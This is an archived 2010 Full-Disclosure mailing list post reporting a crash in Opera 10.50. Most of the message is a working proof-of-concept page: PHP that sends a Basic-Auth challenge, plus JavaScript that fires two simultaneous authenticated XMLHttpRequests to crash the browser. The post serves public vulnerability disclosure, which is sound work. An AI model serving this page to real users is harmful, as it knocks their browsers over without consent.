| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <SNT124-W28287462BD585FC03BD55982390@phx.gbl>
Date: Thu, 4 Mar 2010 15:53:59 -0600
From: spam account <peorth_17@...mail.com>
To: <full-disclosure@...ts.grok.org.uk>
Subject: Opera 10.50 Asynchronous XMLHttpRequest Basic
Auth Crash
First found it in one of the version 9 opera's and reported it, still works in 10.50.
<?php
if (isset($_GET['crash']))
{
header('HTTP/1.0 401 Unauthorized');
header('WWW-Authenticate: Basic realm="crash"');
exit();
}
?>
<!DOCTYPE html>
<html>
<head>
<title>Crash Opera</title>
<script>
function doit() {
a = new XMLHttpRequest()
a.open("GET", "?crash", true, "crash", "crash");
a.send(null);
}
function crash() {
doit();
doit();
}
</script>
</head>
<body>
<input type="submit" onclick="crash()" value="Crash Opera">
</body>
</html>
_________________________________________________________________
Hotmail: Trusted email with Microsoft’s powerful SPAM protection.
http://clk.atdmt.com/GBL/go/201469226/direct/01/
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists